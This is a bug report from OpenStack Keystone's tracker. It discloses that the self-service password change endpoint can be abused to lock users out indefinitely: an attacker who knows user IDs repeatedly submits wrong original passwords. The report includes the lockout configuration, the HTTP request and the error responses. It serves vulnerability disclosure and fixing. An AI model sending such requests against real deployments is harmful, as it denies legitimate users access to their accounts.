OpenStack Identity (keystone)

  1. Bug #1688137
  2. Comment #0

Comment 0 for bug 1688137

Revision history for this message
Samuel de Medeiros Queiroz (samueldmq) wrote : Attacker may use self-service password reset to lock out users indefinitely

This relates to PCI DSS features added in the Newton release.

keystone.conf:
[security_compliance]
# Setting the account lockout threshold
lockout_failure_attempts = 2
lockout_duration = 10

Try to change a user's password on their behalf:

POST /v3/users/<user_id>/password
{
 "user": {
  "original_password": "fake_password",
  "password": "new_password"
 }
}

As the original password is wrong (as the attacker do not know it), after lockout_failure_attempts attempts that user account get locked out by lockout_duration.

Before lockout_failure_attempts attempts, you get:

{
  "error": {
    "code": 401,
    "title": "Unauthorized",
    "message": "The request you have made requires authentication."
  }
}

After lockout_failure_attempts attempts, you get:

{
  "error": {
    "code": 401,
    "title": "Unauthorized",
    "message": "The account is locked for user: 94ab353983174b04955fc9842779b085."
  }
}

This can be used by an attacker to lock out users (if they have access to user IDs) indefinitely by locking out users again and again after lockout_duration has passed.